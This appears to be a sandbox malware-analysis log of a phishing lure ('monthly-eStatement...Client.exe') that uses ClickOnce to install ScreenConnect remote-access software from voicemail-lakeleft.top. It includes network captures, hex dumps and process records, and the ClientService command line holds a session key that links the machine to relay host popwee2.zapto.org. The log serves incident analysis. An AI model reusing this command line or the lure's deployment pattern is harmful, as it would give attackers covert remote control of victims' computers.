2024-11-08 10:09:27 UTC  106                OUT        GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                       Host: voicemail-lakeleft.top
                                                       Accept-Encoding: gzip
2024-11-08 10:09:27 UTC  216                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 95520
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                       Date: Fri, 08 Nov 2024 10:09:26 GMT
                                                       Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.7  49737        194.59.30.201   443               2628  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-08 10:09:28 UTC  114                OUT        GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                       Host: voicemail-lakeleft.top
                                                       Accept-Encoding: gzip
2024-11-08 10:09:28 UTC  216                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 61216
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                       Date: Fri, 08 Nov 2024 10:09:28 GMT
                                                       Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.7  49748        194.59.30.201   443               2628  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-08 10:09:29 UTC  118                OUT        GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                       Host: voicemail-lakeleft.top
                                                       Accept-Encoding: gzip
2024-11-08 10:09:30 UTC  214                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 266
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                       Date: Fri, 08 Nov 2024 10:09:30 GMT
                                                       Connection: close
2024-11-08 10:09:30 UTC  266                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.7  49754        194.59.30.201   443               2628  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-08 10:09:31 UTC  113                OUT        GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                       Host: voicemail-lakeleft.top
                                                       Accept-Encoding: gzip
2024-11-08 10:09:31 UTC  214                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 266
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                       Date: Fri, 08 Nov 2024 10:09:31 GMT
                                                       Connection: close
2024-11-08 10:09:31 UTC  266                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.7  49760        194.59.30.201   443               2628  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-08 10:09:32 UTC  121                OUT        GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                       Host: voicemail-lakeleft.top
                                                       Accept-Encoding: gzip
2024-11-08 10:09:32 UTC  214                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 266
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                       Date: Fri, 08 Nov 2024 10:09:32 GMT
                                                       Connection: close
2024-11-08 10:09:32 UTC  266                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.7  49771        194.59.30.201   443               2628  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-08 10:09:33 UTC  111                OUT        GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                       Host: voicemail-lakeleft.top
                                                       Accept-Encoding: gzip
2024-11-08 10:09:34 UTC  216                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 81696
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                       Date: Fri, 08 Nov 2024 10:09:33 GMT
                                                       Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.7  49779        194.59.30.201   443               2628  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-08 10:09:35 UTC  99                 OUT        GET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                       Host: voicemail-lakeleft.top
                                                       Accept-Encoding: gzip
2024-11-08 10:09:35 UTC  217                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 197120
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                       Date: Fri, 08 Nov 2024 10:09:35 GMT
                                                       Connection: close
                                                                                                                                                                                                                                                                  Data Ascii: RequestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationDataIBitmapDatabitmapDatadat
                                                                                                                                                                                                                                                                  2024-11-08 10:09:35 UTC16384INData Raw: 6b 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 63 65 69 76
                                                                                                                                                                                                                                                                  Data Ascii: kMonitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnect.Properties.CommandReceiv
                                                                                                                                                                                                                                                                  2024-11-08 10:09:35 UTC16384INData Raw: 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00
                                                                                                                                                                                                                                                                  Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVol
                                                                                                                                                                                                                                                                  2024-11-08 10:09:35 UTC16384INData Raw: 72 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06
                                                                                                                                                                                                                                                                  Data Ascii: rtMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI


Session ID: 9
Source IP: 192.168.2.7
Source Port: 49790
Destination IP: 194.59.30.201
Destination Port: 443
PID: 2628
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp: 2024-11-08 10:09:36 UTC | Bytes transferred: 106 | Direction: OUT | Data:
GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip

Timestamp: 2024-11-08 10:09:37 UTC | Bytes transferred: 216 | Direction: IN | Data:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68096
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:09:36 GMT
Connection: close


Session ID: 10
Source IP: 192.168.2.7
Source Port: 49798
Destination IP: 194.59.30.201
Destination Port: 443
PID: 2628
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp: 2024-11-08 10:09:38 UTC | Bytes transferred: 100 | Direction: OUT | Data:
GET /Bin/ScreenConnect.Windows.dll HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip

Timestamp: 2024-11-08 10:09:38 UTC | Bytes transferred: 218 | Direction: IN | Data:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1721856
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:09:38 GMT
Connection: close
                                                                                                                                                                                                                                                                  2024-11-08 10:09:38 UTC16384INData Raw: 70 00 3c 39 3e 5f 5f 43 6c 6f 73 65 44 65 73 6b 74 6f 70 00 43 72 65 61 74 65 44 65 73 6b 74 6f 70 00 53 77 69 74 63 68 44 65 73 6b 74 6f 70 00 4f 70 65 6e 44 65 73 6b 74 6f 70 00 6c 70 44 65 73 6b 74 6f 70 00 54 72 79 45 6e 73 75 72 65 54 68 72 65 61 64 4f 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 4f 70 65 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 6c 70 73 7a 44 65 73 6b 74 6f 70 00 64 65 73 6b 74 6f 70 00 65 5f 73 70 00 55 72 69 53 63 68 65 6d 65 48 74 74 70 00 4e 61 74 69 76 65 43 6c 65 61 6e 75 70 00 6c 70 4c 6f 61 64 4f 72 64 65 72 47 72 6f 75 70 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e
                                                                                                                                                                                                                                                                  Data Ascii: p<9>__CloseDesktopCreateDesktopSwitchDesktopOpenDesktoplpDesktopTryEnsureThreadOnInputDesktopOpenInputDesktoplpszDesktopdesktope_spUriSchemeHttpNativeCleanuplpLoadOrderGroupGetLastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.
                                                                                                                                                                                                                                                                  2024-11-08 10:09:38 UTC16384INData Raw: 00 4f 70 65 6e 52 65 67 69 73 74 72 79 4b 65 79 00 43 72 65 61 74 65 50 72 6f 70 65 72 74 79 4b 65 79 00 47 65 74 48 6f 74 6b 65 79 00 53 65 74 48 6f 74 6b 65 79 00 70 77 48 6f 74 6b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 46 6f 6e 74 46 61 6d 69 6c 79 00 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 6d 69 6c 79 00 54 72 79 44 69 73 61 62 6c 65 46 69 6c 65 53 79 73 74 65 6d 52 65 64 69 72 65 63 74 69 6f 6e 54 65 6d 70 6f 72 61 72 69 6c 79 00 73 65 74 5f 52 65 61 64 4f 6e 6c 79 00 44 69 73 70 6f 73 65 51 75 69 65 74 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79
                                                                                                                                                                                                                                                                  Data Ascii: OpenRegistryKeyCreatePropertyKeyGetHotkeySetHotkeypwHotkeySystem.Security.Cryptographyget_Assemblyget_FontFamilyDefaultFontFamilyTryDisableFileSystemRedirectionTemporarilyset_ReadOnlyDisposeQuietlypointlySelectManyShutdownBlockReasonDestroy


Session ID: 11
Source IP: 192.168.2.7
Source Port: 49814
Destination IP: 194.59.30.201
Destination Port: 443
PID: 2628
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp: 2024-11-08 10:09:40 UTC
Bytes transferred: 106
Direction: OUT
Data:
GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip

Timestamp: 2024-11-08 10:09:41 UTC
Bytes transferred: 217
Direction: IN
Data:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 601376
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:09:41 GMT
Connection: close


Session ID: 12
Source IP: 192.168.2.7
Source Port: 49825
Destination IP: 194.59.30.201
Destination Port: 443
PID: 2628
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp: 2024-11-08 10:09:42 UTC
Bytes transferred: 97
Direction: OUT
Data:
GET /Bin/ScreenConnect.Core.dll HTTP/1.1
Host: voicemail-lakeleft.top
Accept-Encoding: gzip

Timestamp: 2024-11-08 10:09:43 UTC
Bytes transferred: 217
Direction: IN
Data:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 548864
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 08 Nov 2024 10:09:42 GMT
Connection: close
                                                                                                                                                                                                                                                                  Data Ascii: (jX}{~*(+*0)Q{(+tO|(+3*0)Q{(-tO|(+3*V(6}}*{*{*Z(>Z((?X*(=u}u}*(c,{(
                                                                                                                                                                                                                                                                  2024-11-08 10:09:43 UTC16384INData Raw: 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 1b 30 06 00 44 00 00 00 79 01 00 11 03 6f 16 07 00 0a 0a 2b 26 06 6f 17 07 00 0a 0b 07 04 07 6f 0a 0c 00 06 02 05 07 6f 09 0c 00 06 28 0a 09 00 06 6f 0d 0c 00 06 28 02 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3d 04 00 04 02 04 7d 3e 04 00 04 02 05 7d 3f 04 00 04 02 0e 04 7d 40 04 00 04 02 0e 05 7d 41 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 1e 02 7b 40 04 00 04 2a 1e 02 7b 41 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07
                                                                                                                                                                                                                                                                  Data Ascii: o-,o*290Dyo+&ooo(o(o-,o*29(<}=}>}?}@}A*{=*{>*{?*{@*{A*0G*~-:~(,~
                                                                                                                                                                                                                                                                  2024-11-08 10:09:43 UTC16384INData Raw: 00 06 04 3a 6a ff ff ff 2a 0a 17 2a 0a 17 2a 0a 17 2a 0a 17 2a 06 2a 00 00 13 30 05 00 1c 00 00 00 08 00 00 11 05 0e 04 8e 69 0e 05 59 28 60 01 00 0a 0a 03 04 0e 04 0e 05 06 28 32 02 00 0a 06 2a 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 ac 0d 00 06 80 32 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 33 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 b5 0d 00 06 80 38 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 5d 02 00 06 2a 22 03 04 28 63 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 3b 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 36 02 00 06 2a 00 00 00 13 30 03 00 1b 00
                                                                                                                                                                                                                                                                  Data Ascii: :j******0iY(`(2*sjz(<*.s2*(<*2{3oB*(<*6{o{*(<*6{o{*.s8*(<*"(]*"(c*(<*0{;(+d(zo6*0
                                                                                                                                                                                                                                                                  2024-11-08 10:09:43 UTC16384INData Raw: 07 00 04 28 56 06 00 06 8c da 02 00 02 2a 1e 02 28 3c 00 00 0a 2a 36 02 7b 2f 0a 00 0a 16 6f 30 0a 00 0a 2a 36 02 7b 2f 0a 00 0a 17 6f 30 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 22 05 00 0a 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 0b 10 00 06 80 25 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 22 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 12 10 00 06 80 2a 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 52 0b 00 06 2a 3a 0f 01 fe 16 4e 01 00 02 6f 43 00 00 0a 2a 2e 73 16 10 00 06 80 2d 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c4 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a
                                                                                                                                                                                                                                                                  Data Ascii: (V*(<*6{/o0*6{/o0*(<*J{"{#(1*(<*J{'{((1*.s%*(<*o"*oC*.s(*(<*oC*.s**(<*"(R*:NoC*.s-*(<*:oC*(<*
                                                                                                                                                                                                                                                                  2024-11-08 10:09:43 UTC16384INData Raw: 01 f7 02 01 00 10 00 4c b0 00 00 ad 3d 01 00 45 00 8d 01 fb 02 09 01 10 00 89 2e 01 00 ad 3d 01 00 6d 00 8d 01 fc 02 a1 00 10 00 48 26 00 00 ad 3d 01 00 00 00 90 01 03 03 81 01 10 00 fd 2b 01 00 ad 3d 01 00 35 00 90 01 04 03 01 01 00 00 a0 6a 01 00 ad 3d 01 00 c5 00 90 01 05 03 01 01 00 00 00 8e 00 00 ad 3d 01 00 c5 00 96 01 05 03 09 01 10 00 ba 36 01 00 ad 3d 01 00 6d 00 9c 01 05 03 09 01 10 00 6c 50 01 00 ad 3d 01 00 6d 00 a0 01 0d 03 09 01 10 00 4f bc 00 00 ad 3d 01 00 6d 00 a2 01 1b 03 09 01 10 00 1c 3b 01 00 ad 3d 01 00 6d 00 a4 01 26 03 09 01 10 00 12 00 01 00 ad 3d 01 00 6d 00 a8 01 4d 03 81 01 10 00 52 3b 01 00 ad 3d 01 00 35 00 ab 01 61 03 01 20 10 00 84 e3 00 00 ad 3d 01 00 35 00 ad 01 6a 03 01 20 10 00 d3 34 01 00 ad 3d 01 00 35 00 b0 01 82 03
                                                                                                                                                                                                                                                                  Data Ascii: L=E.=mH&=+=5j==6=mlP=mO=m;=m&=mMR;=5a =5j 4=5



                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                  Start time:05:09:15
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe"
                                                                                                                                                                                                                                                                  Imagebase:0xf20000
                                                                                                                                                                                                                                                                  File size:83'376 bytes
                                                                                                                                                                                                                                                                  MD5 hash:27BD2490FD75556AAB2DF57EA7C1147F
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                                  Start time:05:09:16
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                                                  Imagebase:0x1e8b1f20000
                                                                                                                                                                                                                                                                  File size:24'856 bytes
                                                                                                                                                                                                                                                                  MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                                  Start time:05:09:16
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                                  Start time:05:09:18
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                  Start time:06:44:38
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                                                  Imagebase:0xe10000
                                                                                                                                                                                                                                                                  File size:601'376 bytes
                                                                                                                                                                                                                                                                  MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000007.00000002.1569444555.000000000315F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                                  Start time:06:44:38
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"
